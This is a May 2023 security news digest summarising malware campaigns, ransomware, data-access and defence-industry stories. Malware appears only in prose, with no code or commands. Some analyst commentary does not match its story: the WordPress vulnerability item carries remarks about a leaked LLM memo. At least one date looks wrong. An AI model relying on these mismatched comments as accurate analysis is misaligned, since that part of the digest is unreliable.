Daily Drop (482): Russian ‘Ghost Ships’, RoarBAT Malware Attacks Ukraine, Western Digital leaks, China Limits Data, U.S. military factory blew up, Beijing-Moscow Security Cooperation
05-08-2023
Monday, May 08, 2023 // (IG): BB // Cloak & Dagger// Coffee for Bob
Security News This Week: Russian ‘Ghost Ships’ Identified Near the Nord Stream Blasts
Analyst Comments: The investigation provides significant evidence suggesting the possible involvement of Russian vessels in the Nord Stream pipeline explosions. However, the investigation does not provide conclusive evidence to support these allegations. The exact cause of the blasts is still unknown, and official investigations are ongoing in multiple European countries.
FROM THE MEDIA: Russian ships with underwater operations equipment were present near the sites of the Nord Stream gas pipeline explosions in September 2022, according to a joint investigation by national broadcasters in Denmark, Norway, Sweden, and Finland. The journalists used intercepted radio broadcasts from the ships and satellite images to locate and track their movements. Three ships, including the navy research ship Sibiryakov and a tugboat called SB-123, sailed from Russian naval bases to near the blast sites in June and September 2022. Another Russian vessel, the SS-750, was near the pipelines four days before they were blown up. The investigation raises questions about the ships' unusual behavior but does not conclude what they were doing near the Nord Stream sites.
READ THE STORY: Wired // SkyNews
CERT-UA Warns of SmokeLoader and RoarBAT Malware Attacks Against Ukraine
Analyst Comments: The phishing campaign distributing SmokeLoader malware highlights the continued use of email as a vector for malware distribution. Polyglot files, which are archives that contain multiple data types, are increasingly being used by attackers to evade detection. SmokeLoader malware, with its objective of downloading more effective malware, poses a significant threat to organizations. CERT-UA's report also underscores the increasing use of destructive attacks by cybercriminals to cause harm to targeted organizations. The development of wiper malware capable of destroying data irretrievably poses a grave threat to the integrity and availability of an organization's systems and data.
FROM THE MEDIA: The Computer Emergency Response Team of Ukraine (CERT-UA) has reported a phishing campaign distributing the SmokeLoader malware in the form of a polyglot file via email with invoice-themed lures. The emails use compromised accounts and a ZIP archive that contains a decoy document and a JavaScript file. The JavaScript code launches an executable that loads the SmokeLoader malware, which is designed to download or load more effective malware onto infected systems. CERT-UA linked the campaign to UAC-0006, which it characterized as a financially motivated operation seeking to steal credentials and transfer funds without authorization. CERT-UA also revealed a new batch script-based wiper malware called RoarBAT, which targeted an unnamed state organization, that performs a recursive search for files with specific extensions and deletes them irretrievably.
READ THE STORY: THN
BlackCat ransomware gang claims major cyber attack on Western Digital, leaks stolen data
Analyst Comments: The cyberattack on Western Digital highlights the growing threat of ransomware attacks, which can result in data theft, system disruption, and significant financial losses for organizations. The BlackCat ransomware gang's involvement in the attack, along with its claims of stealing confidential company data, pose a significant risk to Western Digital and its customers. The threat actors' ability to infiltrate the company's internal systems and steal data underscores the importance of robust cybersecurity measures and the need for organizations to be vigilant in safeguarding their networks against cyber threats. The post by the BlackCat ransomware gang, which included screenshots of internal emails and video conferences, highlights the potential reputational damage that can result from such cyberattacks, as well as the risks posed by the public exposure of sensitive information.
FROM THE MEDIA: California-based data storage device maker Western Digital suffered a cyberattack on 26 March that resulted in threat actors accessing its internal systems and stealing data. The notorious BlackCat ransomware gang has claimed responsibility for the attack and published the company's name on its data leak site. The gang posted screenshots of video conferences and internal emails circulated within the company, including emails where officials discussed how to respond to the cyberattack. The post also includes a note for the company, where the threat actors have threatened to leak the stolen data periodically until they lose "interest" and then put it up for sale on the dark web. The post suggests that the threat actors are in possession of confidential company data such as code-signing certificates, firmware, and personal information of Western Digital customers. Western Digital is yet to respond to the claims of the threat actors or confirm whether any ransom was demanded by the hacker group.
READ THE STORY: Teiss
China Limits Data After US Research Spurred Alarm
Analyst Comments: Beijing's restrictions on foreign access to Chinese data sources are not surprising given its broader move to tighten its grip on sensitive data. However, the move will make it harder for think tanks, research houses, and consultancies to analyze what is happening in China, exacerbating tensions between China and the US. Restrictions on data access are also likely to have knock-on effects on investment and transparency in the country.
FROM THE MEDIA: Beijing has curtailed foreign access to Chinese data sources at least partially due to concerns over reports from US-based research institutions based on publicly available data. Senior officials in Beijing grew alarmed by reports from American think tanks such as the Center for Security and Emerging Technology at Georgetown University and the Center for a New American Security, which focused on sensitive issues such as collaboration between the military and private organizations. The clampdown coincided with a broader tightening of controls on data in China and a crackdown on foreign consultancies. Access to sensitive information such as patents and statistics was restricted from overseas, according to the Cyberspace Administration of China, the country's powerful internet overseer.
READ THE STORY: Bloomberg
China lands mysterious reusable spacecraft after a 276-day trek
Analyst Comments: This Asia in Brief roundup covers a wide range of topics, including space technology, smartphones, crypto, chatbots, patents, agriculture, and investments. The news items offer a glimpse of the current economic, technological, and geopolitical landscape in Asia, with varying levels of detail and impact. Some items highlight major developments, such as the return of China's reusable spacecraft and Dyson's battery plant investment, while others touch on more niche or regional issues, such as the buffalo semen loss and India's patent reform. The news items collectively suggest that Asia remains a hotbed of innovation, competition, and challenges, as countries and companies strive to navigate a complex and dynamic environment shaped by global and local trends.
FROM THE MEDIA: Chinese state media announced on Monday the successful return to Earth of a reusable spacecraft after 276 days in orbit. While the specifics of the mission are undisclosed, the spacecraft is thought to be a spaceplane capable of carrying up to six crew. This comes as China seeks to gain capabilities in space and rival the USA’s X-37 spaceplane, which is the most capable spaceplane currently in service. Meanwhile, smartphone sales have slumped in India and China. Chinese sales fell by 11.8% year on year in Q1 2023, while India’s market saw a 16% YoY decline. However, the smartphones purchased were more expensive and capable, with the average selling price reaching an all-time high in India of USD 265 and 5G smartphone share rising from 31% to 45%.
READ THE STORY: The Register
The Data Broker That Targeted Abortion Clinics Landed a US Military Contract
Analyst Comments: SafeGraph's contract with the US Air Force is a significant expansion of its business into the military and national security domains. While the company has previously worked with government agencies, this is the first publicly reported relationship between SafeGraph and the US military. The company's ability to provide data on sensitive locations and adversary state-owned enterprises raises questions about the potential use of its data in military operations and intelligence gathering. SafeGraph's data has historically been used by marketers and hedge funds, and its entry into the military market raises ethical concerns about the use of such data in the context of warfare. The company's ties to In-Q-Tel, a CIA-backed venture capital firm, further complicate these concerns. It remains to be seen how SafeGraph's relationship with the US Air Force will develop, but the potential implications for the use of location data in military operations are significant.
FROM THE MEDIA: SafeGraph, a data broker that previously sold location data related to abortion clinic visits, has signed a contract with the US Air Force. Under the $74,888 "Phase 1" contract with AFWERX, the "innovation wing" of the Air Force, SafeGraph has agreed to provide information about "sensitive places" and "adversary state-owned enterprises" around the world, which the military can use for "analyzing human activity for landing zone selection." The records show that SafeGraph's data can help identify hospitals, schools, houses of worship, and other locations to "help avoid collateral damage." The company also claims that it can provide data on locations of value to China's Belt and Road Initiative, as well as locations of adversary state-owned enterprises to support "intelligence preparation of the battlespace."
READ THE STORY: Wired
The U.S. military relies on one Louisiana factory. It blew up
Analyst Comments: The report highlights the risks associated with America's reliance on a single source for vital components, which is particularly problematic when it comes to producing munitions for military use. The consolidation of defense suppliers, resulting in fewer major arms suppliers and fewer lower-tier suppliers, has led to the emergence of the “single source” problem. Although the Pentagon is aware of the problem, it does not track vulnerabilities down the supply chain, which can lead to unnoticed failures for months. The Defense Department's plan to spend over $207 million to bring the production of materials back to the U.S. is a step towards reducing supply chain risks.
FROM THE MEDIA: A black powder mill explosion in June 2021 destroyed all production of the single vital component needed to produce bullets, mortar shells, artillery rounds, and Tomahawk missiles. Black powder, the original form of gunpowder, is used to ignite more powerful explosives in small quantities in munitions, and there is no substitute for it. With a limited sales volume and thin profits, only one production facility is operational in North America, which makes the military vulnerable to the “single source” problem. Consolidation of defense industrial base suppliers has left many lower-tier firms as the sole makers of vital parts. The Pentagon does not track vulnerabilities down the supply chain and is not aware of failures for months by prime contractors or itself. The Defense Department has identified 27 critical chemicals sourced from countries considered adversaries of the U.S. and expects to spend more than $207 million to bring production of materials back to the U.S. as soon as possible.
READ THE STORY: Modern Diplomacy
What Is So Special about Beijing-Moscow Security Cooperation
Analyst Comments: The article provides an insightful analysis of the evolving security cooperation between Russia and China, highlighting some important aspects that are often overlooked in the Western media. The author makes a compelling case for the principles that guide this cooperation and argues that it has the potential to contribute to global security in a meaningful way.
FROM THE MEDIA: Chinese Defense Minister Li Shangfu's visit to Russia has brought the focus on the ongoing security cooperation between Moscow and Beijing. While the West remains suspicious of the security dimension of Russia-China cooperation, the two nations are moving towards a new model of cooperation that is based on the principles of sovereignty, flexibility, balance of interests, non-targeting of third countries, and a diverse combination of bilateral and multilateral formats. The cooperation on global public goods should be as open as possible to other international actors, and there is a need for more intense coordination between the two nations.
READ THE STORY: Modern Diplomacy
Revolutionizing Electronic Warfare: The Power Of Cognitive Electronic Warfare Systems
Analyst Comments: The article provides a comprehensive overview of the global cognitive electronic warfare system market. It highlights the key factors that are expected to drive or hinder the growth of the market during the forecast period. The article also identifies the top companies operating in the market. However, the article lacks specific data on the size of the market and the expected growth rate during the forecast period.
FROM THE MEDIA: The global cognitive electronic warfare system market is expected to grow during the forecast period of 2023-2032 due to the increasing demand for artificial intelligence in the military and the growing situational awareness of cognitive electronic warfare systems. The market is segmented based on capability and platform, with the airborne platform being the most popular due to its effective implementation in aircraft, fighter jets, and unmanned aerial vehicles (UAVs). However, the high deployment cost of cognitive electronic warfare acts as a restraint to the growth of the electronic warfare market.
READ THE STORY: MENAFN
DEF CON to set thousands of hackers loose on LLMs
Analyst Comments: The DEF CON AI Village's move to invite hackers to test the security and vulnerabilities of language models is a proactive step that can help identify the weaknesses of AI models before they are used to create damage. It is a crucial step toward ensuring that these models are secure and bias-free. The event will encourage more people to learn how to red team and assess these models, which can lead to a better understanding of AI. The involvement of the White House Office of Science, Technology, and Policy; America's National Science Foundation's Computer and Information Science and Engineering (CISE) Directorate; and the Congressional AI Caucus shows that the government is taking AI security seriously.
FROM THE MEDIA: DEF CON AI Village is inviting hackers to find bugs and biases in large language models (LLMs) created by companies such as OpenAI, Google, and Anthropic, among others. The event, which will be the largest-ever red teaming exercise for any group of AI models, is set to host thousands of people, including hundreds of students from overlooked communities, all of whom will find flaws in LLMs used by chatbots and generative AI. The event will run from August 10-13 in Las Vegas, and hackers will have access to laptops and timed access to LLMs from various vendors. They will also have access to an evaluation platform developed by Scale AI. The announcement of the event comes as US Vice President Kamala Harris and senior Biden administration officials met with the bosses of OpenAI, Anthropic, Microsoft, and Google to discuss the risks AI poses to individuals and national security.
READ THE STORY: The Register
New Cactus ransomware encrypts itself to evade antivirus
Analyst Comments: The emergence of Cactus ransomware is concerning, particularly as it is targeting large commercial entities. This suggests that the threat actor behind Cactus is well-resourced and may be looking for significant payouts from its victims. What is particularly worrying is that the use of encryption to protect the ransomware binary suggests that the threat actor is evolving its tactics to avoid detection by security software. This will make it even harder for victims to defend against such attacks. Cactus ransomware also steals data from victims, adding to the pressure to pay the ransom. While there is no public information about the ransoms that Cactus demands from its victims, sources suggest that they are in the millions. It is important for organizations to take steps to protect themselves from such attacks, including ensuring that VPN appliances are up to date and monitoring the network for large data exfiltration tasks.
FROM THE MEDIA: A new ransomware operation called Cactus has been exploiting vulnerabilities in VPN appliances to gain initial access to the networks of large commercial entities. According to Kroll corporate investigation and risk consulting firm, the new threat actor pivots inside from a VPN server with a VPN service account to obtain initial access into the victim's network. What sets Cactus apart from other ransomware operations is its use of encryption to protect the ransomware binary. The actor uses a batch script to obtain the encryptor binary using 7-Zip, with the entire process aimed at preventing detection. In addition, the threat actor also steals data from victims using the Rclone tool to transfer files straight to cloud storage. After exfiltrating data, the hackers use a PowerShell script called TotalExec to automate the deployment of the encryption process. Kroll's research shows that Cactus has used a modified variant of the open-source PSnmap Tool, which is a PowerShell equivalent of the Nmap network scanner, to conduct deeper reconnaissance.
READ THE STORY: Bleeping Computer
Meta Is Trying to Push Attackers to the Brink
Analyst Comments: The increasing use of multiple platforms by attackers to distribute malware infrastructure highlights the need for companies to be more vigilant and proactive in their security measures. By distributing their activities across multiple platforms, attackers can make it harder for companies to detect their malicious activities. However, Meta's new tools and resources for business users are a step in the right direction in protecting businesses against these evolving threats. It is also commendable that the company is sharing information with other tech companies and law enforcement to create a more coordinated and effective response to these attacks.
FROM THE MEDIA: Meta, the parent company of Facebook, has reported that attackers are increasingly using multiple platforms to distribute their malware infrastructure in an effort to make it more difficult for tech companies to detect their activities. As a response, Meta is launching new tools and resources to provide additional protection for business users, such as new controls for business accounts and a step-by-step tool to help them flag and remove malware on their enterprise devices. The company has also identified a new malware strain called NodeStealer, which targeted Windows browsers to record victims' usernames and passwords, steal cookies, and use the data to compromise Facebook accounts, Gmail, and Outlook accounts. Meta attributes this campaign to Vietnamese actors and says it quickly began submitting takedown requests to hosting providers, domain registrars, and other application services that the actor was using for its activity and malware distribution.
READ THE STORY: Wired
New Vulnerability in Popular WordPress Plugin Exposes Over 2 Million Sites to Cyberattacks
Analyst Comments: The leaked document offers an interesting perspective on the current state of language model development and the role of open-source models. While the document is only the opinion of a Google employee, it raises important points about the limitations of large models and the advantages of open-source development. The document's arguments are well-supported and could serve as a starting point for further discussion and analysis of the open-source LLM landscape.
FROM THE MEDIA: The discovery of the CVE-2023-30777 vulnerability in the Advanced Custom Fields (ACF) plugin for WordPress highlights the need for timely software updates and vigilant user education to prevent social engineering attacks. As the plugin has a broad user base, it's crucial to update to the latest version to protect against this vulnerability. Organizations should also maintain updated antivirus and antimalware software to provide additional layers of protection. Website owners should also consider using web application firewalls (WAFs) to block malicious traffic and apply appropriate permissions and access controls to minimize the impact of an attack.
READ THE STORY: THN
Foxconn Founder Vows to 'Preserve Peace' With China if Elected Taiwan President
Analyst Comments: The statement by Terry Gou shows that he aims to improve relations between Taiwan and China, which have been severely strained under President Tsai Ing-wen's leadership. However, Gou's perceived coziness with Beijing's leadership raises concerns about his loyalty to Taiwan's sovereignty. It remains to be seen how Gou's candidacy will affect the upcoming presidential election in Taiwan, as he faces a challenging race against the incumbent DPP's candidate and other potential candidates.
FROM THE MEDIA: Terry Gou, the billionaire founder of Foxconn and a key supplier of Apple's iPhones, announced in April 2022 that he plans to seek the presidential nomination of Taiwan's China-friendly opposition Kuomintang party. During his first-ever rally in Taiwan's southern city of Kaohsiung, Gou vowed that if he is elected president of Taiwan in January 2024, he can "preserve peace" between the democratic self-ruled island and China. Gou urged his supporters to let him preserve peace, adding that he can "do better than Tsai Ing-wen, or William Lai," the current Taiwanese vice president who has been nominated as the DPP's candidate. However, critics are concerned about Gou's perceived coziness with Beijing's leadership, given his massive factories built in China.
READ THE STORY: VOA
The NSA’s research chief on emerging tech — including ‘beyond belief’ leaps in AI
Analyst Comments: The article provides insights into the work of the NSA's Research Directorate and its focus on staying operationally relevant. Herrera's comments on emerging technologies such as AI and quantum computing highlight both their potential and potential risks, particularly in relation to security.
FROM THE MEDIA: Gilbert Herrera, who spent almost four decades at Sandia National Laboratories, was appointed in 2021 as the head of the National Security Agency's Research Directorate. In an interview with The Record, he discussed the role of the directorate, its emphasis on being operationally relevant, and the outlook for emerging technologies such as artificial intelligence and quantum computing. Herrera highlighted the need to balance today's problems with those of tomorrow and the future, as well as the importance of integrating security into new technologies such as AI.
READ THE STORY: The Record
Items of interest
Neuberger: Counter Ransomware Initiative focused on ‘expanding the tent,’ with Jordan, Costa Rica, and Columbia joining
Analyst Comments: The ongoing debate around banning ransomware payments underscores the challenge of addressing the growing threat of ransomware attacks. While ransom payments can incentivize attackers to continue their activities, banning them would leave organizations with few options for recovering their data and systems. Moreover, many organizations are likely to find a way around the ban and pay the ransom anyway, creating additional legal and logistical issues. Ultimately, the debate highlights the need for a comprehensive, multi-pronged approach to tackling the ransomware threat, including measures to improve cybersecurity, disrupt criminal networks, and strengthen international cooperation.
FROM THE MEDIA: The U.S. Counter Ransomware Initiative is grappling with the question of whether ransomware payments should be banned, with select waivers available for special situations. White House Deputy National Security Adviser Anne Neuberger said ransomware payment bans have been discussed among members of the initiative. There were over 6,500 ransomware attacks across the globe between 2020 and 2022, prompting difficult discussions about ways to disrupt the ecosystem. Although several U.S. states have banned local government entities from paying ransoms connected to attacks, the bans have so far done little to stop gangs from targeting them. Cybersecurity experts, and even the FBI, have repeatedly come out against the idea of banning payments, noting that it would only further harm victims.
READ THE STORY: The Record
Exposing Modern-Day Scammers | Brett Johnson (Video)
FROM THE MEDIA: The video is a collection of disjointed and fragmented sentences that appear to be excerpts from various conversations and interviews with Brett Johnson, who is a former cybercriminal and FBI's most wanted. The topics discussed range from scams, criminal activities, addiction, family struggles, and prison experiences. Brett Johnson also talks about his book, "Bailout: An Insider's Account of Bank Failures and Rescues," and his podcast where he interviews law enforcement officials and former criminals.
FBI's Most Wanted Con Artist Explains The Art of Being a Snitch (Video)
FROM THE MEDIA: The podcast covers various topics, including the speaker's personal life, his experience as a con artist, being a snitch, and China's tech industry. Matt Coxs talks about his arrest and prison sentence, getting involved in commercials, and working out. He also discusses politics, teachers' salaries, and his friend's extensive knowledge of the drug trade. The conversation jumps around a lot and lacks coherence
These open-source products are reviewed by analysts at InfoDom Securities, providing possible context about current media trends related to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in their original material or related links on their sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.